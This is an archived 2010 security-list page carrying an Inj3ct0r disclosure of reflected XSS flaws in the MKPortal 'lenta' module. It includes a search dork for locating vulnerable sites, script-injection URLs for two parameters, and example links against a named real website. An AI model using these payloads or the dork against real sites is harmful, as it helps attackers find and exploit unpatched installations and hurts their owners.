Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  CORE-2010-0323: XSS Vulnerability in NextGEN Gallery Wordpress Plugin

  ZDI-10-065: CA XOsoft xosoapapi.asmx Multiple Remote Code Execution Vulnerabilities

  ZDI-10-066: CA XOsoft Control Service entry_point.aspx Remote Code Execution Vulnerability

  CA20100406-01: Security Notice for CA XOsoft

From:Inj3ct0r.com <inj3ct0r_(at)_list.ru>
Date:7 апреля 2010 г.
Subject:MKPortal lenta module XSS Vulnerability



=======================================
MKPortal lenta module XSS Vulnerability
=======================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


##################################################
Vulnerable products: MKPortal module lenta Exploit
Dork: "inurl:index.php?ind=" graber lenta
##################################################

1. Multiple pXSS
Vulnerability in the file index.php.

Exploit:

/index.
php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3
E
/index.
php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3
E

Example:

http://www.nissanclub72.ru/index.php?ind=lentanews&output=%3Cscript%3
Ealert
(1)%3C/script%3E
http://www.nissanclub72.ru/index.php?ind=lentanews&blocks=%3Cscript%3
Ealert
(1)%3C/script%3E

# Inj3ct0r.com [2010-04-07]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород